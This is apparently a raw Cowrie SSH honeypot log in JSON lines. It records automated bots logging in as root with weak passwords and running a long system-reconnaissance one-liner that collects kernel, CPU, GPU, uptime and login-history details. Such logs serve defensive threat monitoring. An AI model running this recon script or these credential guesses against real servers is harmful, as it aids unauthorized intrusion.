{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.479380Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.479944Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.481175Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.482749Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.483714Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.484558Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.485610Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.486243Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.487085Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.487650Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.489103Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:49:45.489486Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:49:46.610047Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:46.611176Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:46.612179Z","src_ip":"212.227.235.229","session":"c3e3e62a4f66"}
{"eventid":"cowrie.session.closed","duration":"262.2","message":"Connection lost after 262.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:49:49.134257Z","src_ip":"212.227.235.229","session":"a058081f4b0b"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:50:13.957777Z","src_ip":"212.227.235.229","session":"4da2e6e24d3b"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:50:32.263054Z","src_ip":"212.227.235.229","session":"e7b3ac98d06a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27268,"dst_ip":"1.2.3.4","dst_port":22,"session":"f25b5ae82b95","protocol":"ssh","message":"New connection: 212.227.235.229:27268 (1.2.3.4:22) [session: f25b5ae82b95]","sensor":"my-vps","timestamp":"2025-08-26T20:51:06.917381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:51:06.918889Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:51:07.084807Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e","message":"login attempt [root/1q@W3e] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:51:07.705545Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:51:08.118236Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T20:51:08.119034Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:51:08.294242Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:51:08.295416Z","src_ip":"212.227.235.229","session":"f25b5ae82b95"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:51:22.039142Z","src_ip":"212.227.235.229","session":"d872a4a2925e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:52:19.489298Z","src_ip":"212.227.125.160","session":"a12108356423"}
{"eventid":"cowrie.session.closed","duration":180.20020699501038,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:52:19.494180Z","src_ip":"212.227.125.160","session":"a12108356423"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51386,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e24d8b9b31e","protocol":"ssh","message":"New connection: 212.227.235.229:51386 (1.2.3.4:22) [session: 0e24d8b9b31e]","sensor":"my-vps","timestamp":"2025-08-26T20:52:25.632677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:52:26.362712Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:52:26.363466Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":50470,"dst_ip":"1.2.3.4","dst_port":22,"session":"36993d205782","protocol":"ssh","message":"New connection: 45.88.8.186:50470 (1.2.3.4:22) [session: 36993d205782]","sensor":"my-vps","timestamp":"2025-08-26T20:52:29.492842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:52:29.986635Z","src_ip":"45.88.8.186","session":"36993d205782"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:52:29.988321Z","src_ip":"45.88.8.186","session":"36993d205782"}
{"eventid":"cowrie.login.success","username":"root","password":"654321","message":"login attempt [root/654321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:52:31.937357Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234qwer!@#$","message":"login attempt [root/1234qwer!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:52:32.170180Z","src_ip":"45.88.8.186","session":"36993d205782"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:52:32.612470Z","src_ip":"45.88.8.186","session":"36993d205782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:52:34.457484Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.458213Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.458919Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.460003Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.461359Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.461986Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.462803Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.464020Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.464600Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.465090Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.465524Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.466245Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:52:34.466856Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49112,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd71463da862","protocol":"ssh","message":"New connection: 212.227.235.229:49112 (1.2.3.4:22) [session: dd71463da862]","sensor":"my-vps","timestamp":"2025-08-26T20:52:37.351101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:52:37.352310Z","src_ip":"212.227.235.229","session":"dd71463da862"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:52:37.614417Z","src_ip":"212.227.235.229","session":"dd71463da862"}
